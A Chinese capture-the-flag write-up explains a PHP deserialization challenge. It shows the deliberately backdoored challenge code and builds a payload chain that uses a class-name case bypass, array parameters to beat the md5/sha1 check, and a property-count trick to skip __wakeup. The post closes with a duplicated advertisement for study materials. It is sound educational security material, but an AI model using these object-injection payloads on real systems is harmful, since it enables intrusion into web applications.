[网络安全 CTF] 记一次PHP序列化反序列化解题详析_ctfphp的new类

<?php
error\_reporting(0);
function backdoor()
{
    $a = $\_GET["a"];
    $b = $\_GET["b"];
    $d = $\_GET["d"];
    $e = $\_GET["e"];
    $f = $\_GET["f"];
    $g = $\_GET["g"];
    $class = new $a($b);
    $str1 = substr($class, $d, $e);
    $str2 = substr($class, $f, $g);
    $str1($str2);
}

class popko
{
    public $left;
    public $right;

    public function \_\_call($method,$args)
    {
        if (($this->left != $this->right) && (md5($this->left) === md5($this->right)) && (sha1($this->left) === sha1($this->right))) {
            echo "backdoor is here";
            backdoor();
        }
    }

    public function \_\_wakeup()
    {
        $this->left = "";
        $this->right = "";
    }
}

class pipimi
{
    function \_\_destruct()
    {
        echo $this->a->a();
    }
}

$c = $\_GET["c"];
if ($c != null) {
    if (strstr($\_GET["c"], "popko") === false) {
        unserialize($\_GET["c"]);
    } else {
        echo ":)";
    }
} else {
    highlight\_file(\_\_FILE\_\_);
} 

代码开门见山给出backdoor函数，而该函数在popko类的call方法中调用

故需要运行call方法

而call方法是在对象上下文中调用不可访问的方法时触发的

故需要调用不可访问的方法

而恰巧destruct方法中并不存在a对象和a函数

故需要运行destruct方法

而destruct方法在对象被销毁时触发

如何实现对象被销毁呢？

当序列化后的语句被反序列化之后，对象会被销毁，从而触发destruct方法

所以思路就是： 在pipimi类中构造一个对象，当pipimi中的destruct被执行后，调用popko类，从而运行call方法，进而调用backdoor函数

对于

 if (strstr($\_GET["c"], "popko") === false) {
        unserialize($\_GET["c"]);
    } else {
        echo ":)";

这串代码的意思是：当我们传入的c不含有popko时 ，将对传入的参数c进行反序列化；否则将打印:)

所以我们要传入一个参数c，让它实现反序列化，却又含有popko

由于PHP是一种弱语言，函数名、方法名、类名不区分大小写，即class Object 与 class object 在解析时被当作一个变量

而strstr函数是区分大小写的

所以可以利用类名大小写不敏感但过滤函数大小写敏感的特性，构造popko链子（将popko改为Popko）

对于

 if (($this->left != $this->right) && (md5($this->left) === md5($this->right)) && (sha1($this->left) === sha1($this->right))) {
            echo "backdoor is here";
            backdoor();
        }

要求left和right值不同，但md5加密所得的值相同，才能调用backdoor()函数

故使用数组传参绕过，即left[]=1&right[]=2

所以构造的链子为：
/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":2:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}

对象类名是 "pipimi"，有一个属性 "a"。
"a" 属性的值是另一个对象类型 "Popko"。
"Popko" 对象有两个属性： "left" 和 "right"。
"left" 属性是一个包含一个元素的数组，该元素的值为 1。
"right" 属性是一个包含一个元素的数组，该元素的值为 2。

而执行unserialize()时，先会调用wakeup方法，如何绕过呢？

当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeup方法的执行

所以将Popko的属性个数值增加为3即可：

/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":3:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}

回显如下：

成功进入后门

接着我们看看后门函数是怎么描述的：

function backdoor()
{   $a = $\_GET["a"];
    $b = $\_GET["b"];
    $d = $\_GET["d"];
    $e = $\_GET["e"];
    $f = $\_GET["f"];
    $g = $\_GET["g"];
    $class = new $a($b);
    $str1 = substr($class, $d, $e);
    $str2 = substr($class, $f, $g);
    $str1($str2);}

$class = new $a($b); 此语句new了新的类，但不可进行反序列化，这就遇到了需要反序列化但没有指定类的情况，所以只能找到PHP内置类（即原生类）来进行反序列化。

对于参数a，使用原生类中的error类即可

最后

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！

如果你觉得这些内容对你有帮助，需要这份全套学习资料的朋友可以戳我获取！！

由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！

础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！**

如果你觉得这些内容对你有帮助，需要这份全套学习资料的朋友可以戳我获取！！

由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！